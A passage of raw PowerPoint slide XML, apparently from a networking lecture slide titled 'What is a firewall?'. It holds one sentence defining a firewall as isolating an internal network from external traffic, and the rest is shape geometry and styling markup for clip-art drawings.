        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6629400" y="4744800"/>
            <a:ext cx="2285640" cy="211284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What is a firewall?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="214"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The firewall isolates an organization’s internal network from a larger external network, allowing some packets to pass, blocking others</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="004666"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="215" name="CustomShape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2427120" y="3276720"/>
            <a:ext cx="2653920" cy="1550520"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>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00FFFF"/>
          </a:solidFill>
          <a:ln w="9360">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:effectRef>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="216" name="CustomShape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3681360" y="4668840"/>
            <a:ext cx="177480" cy="114120"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="112" h="72">
                <a:moveTo>
                  <a:pt x="43" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="72"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="69" y="72"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="112" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="43" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="33CCCC"/>
          </a:solidFill>
          <a:ln w="9360">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:effectRef>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="217" name="CustomShape 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3772080" y="4299120"/>
            <a:ext cx="82080" cy="37440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218" name="CustomShape 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3683160" y="4405320"/>
            <a:ext cx="112320" cy="37440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219" name="CustomShape 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3683160" y="4405320"/>
            <a:ext cx="112320" cy="374400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="11160">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:effectRef>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="220" name="CustomShape 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3681360" y="4294080"/>
            <a:ext cx="177480" cy="114120"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="112" h="72">
                <a:moveTo>
                  <a:pt x="43" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="72"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="69" y="72"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="112" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="43" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="33CCCC"/>
          </a:solidFill>
          <a:ln w="9360">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:effectRef>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="221" name="CustomShape 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3681360" y="4294080"/>
            <a:ext cx="177480" cy="114120"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="112" h="72">
                <a:moveTo>
                  <a:pt x="43" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="72"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="69" y="72"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="112" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="43" y="0"/>
                </a:lnTo>
                <a:close/>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222" name="Line 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3859200" y="4303440"/>
            <a:ext cx="1440" cy="3650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223" name="Line 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3795480" y="4668480"/>
            <a:ext cx="63720" cy="1112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224" name="CustomShape 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3699000" y="4454640"/>
            <a:ext cx="72720" cy="213840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="3333CC"/>
          </a:solidFill>
          <a:ln w="9360">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:effectRef>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="225" name="CustomShape 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3699000" y="4454640"/>
            <a:ext cx="72720" cy="213840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="11160">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:effectRef>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="226" name="CustomShape 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3710160" y="4519440"/>
            <a:ext cx="55080" cy="7596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227" name="CustomShape 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2563920" y="4300560"/>
            <a:ext cx="394920" cy="329760"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="249" h="208">
                <a:moveTo>
                  <a:pt x="68" y="27"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="70" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="72" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="73" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="74" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="75" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="79" y="12"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="81" y="12"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="83" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="86" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="88" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="91" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="95" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="98" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="103" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="107" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="111" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="116" y="5"/>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5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="208" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="210" y="29"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="213" y="31"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="216" y="33"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="220" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="222" y="40"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="224" y="44"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="226" y="50"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="245" y="68"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="240" y="116"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="208" y="132"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="247" y="144"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="247" y="146"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="248" y="148"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="248" y="151"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="249" y="154"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="248" y="159"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="247" y="163"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="244" y="169"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="144" y="208"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="162"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="158"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25" y="149"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28" y="26"/>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28" name="CustomShape 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2701800" y="4324320"/>
            <a:ext cx="124920" cy="144000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="79" h="91">
                <a:moveTo>
                  <a:pt x="78" y="4"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="78" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="77" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="74" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="72" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="69" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="65" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="60" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="56" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="50" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="44" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="31" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="18"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="26"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="35"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="47"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="60"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="74"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="89"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="89"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="89"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="88"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="88"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15" y="88"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="88"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22" y="88"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="88"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="32" y="87"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38" y="88"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="44" y="88"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="50" y="88"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57" y="88"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64" y="89"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71" y="90"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="79" y="91"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="79" y="88"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="78" y="81"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="77" y="70"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76" y="57"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76" y="43"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="77" y="15"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="78" y="4"/>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229" name="CustomShape 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2714760" y="4363920"/>
            <a:ext cx="209160" cy="142560"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="132" h="90">
                <a:moveTo>
                  <a:pt x="1" y="67"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="79"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="86" y="90"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="89" y="88"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="91" y="87"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="94" y="85"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="98" y="83"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="103" y="79"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="107" y="76"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="112" y="71"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="117" y="66"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="121" y="60"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="125" y="55"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="128" y="47"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="131" y="39"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="132" y="31"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="132" y="23"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="129" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="129" y="12"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="128" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="127" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="126" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="124" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="117" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="113" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="113" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="114" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="117" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="118" y="19"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="118" y="29"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="117" y="39"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="114" y="51"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="108" y="64"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="107" y="65"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="106" y="66"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="105" y="66"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="103" y="67"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="100" y="69"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="98" y="70"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="96" y="71"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="92" y="72"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90" y="72"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="85" y="73"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="82" y="73"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="78" y="73"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="73" y="72"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="69" y="72"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="69" y="84"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="77"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="67"/>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230" name="CustomShape 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2689200" y="4503600"/>
            <a:ext cx="151920" cy="50400"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="96" h="32">
                <a:moveTo>
                  <a:pt x="96" y="12"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="12"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="93" y="32"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="96" y="12"/>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31" name="CustomShape 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2763720" y="4521240"/>
            <a:ext cx="66240" cy="21960"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="42" h="14">
                <a:moveTo>
                  <a:pt x="42" y="6"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="40" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="42" y="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232" name="CustomShape 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2697120" y="4510080"/>
            <a:ext cx="43920" cy="15480"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="28" h="10">
                <a:moveTo>
                  <a:pt x="28" y="5"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28" y="5"/>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233" name="CustomShape 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2589120" y="4524480"/>
            <a:ext cx="256680" cy="87120"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="162" h="55">
                <a:moveTo>
                  <a:pt x="0" y="17"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="17"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="17"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="17"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="15"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="15"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="15"/>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1" y="29"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="159" y="31"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="158" y="32"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="157" y="33"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="155" y="35"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="152" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="150" y="39"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="147" y="41"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="144" y="43"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="141" y="46"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="137" y="48"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="135" y="50"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="131" y="52"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="128" y="53"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="126" y="55"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="17"/>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234" name="CustomShape 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2846520" y="4514760"/>
            <a:ext cx="90000" cy="41040"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="57" h="26">
                <a:moveTo>
                  <a:pt x="6" y="26"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="57" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="25"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="26"/>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235" name="CustomShape 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2606760" y="4341960"/>
            <a:ext cx="50400" cy="193320"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="32" h="122">
                <a:moveTo>
                  <a:pt x="32" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="32" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="31" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="122"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="122"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="122"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="122"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="122"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="121"/>
                </a:lnTo>
                <a:lnTo>
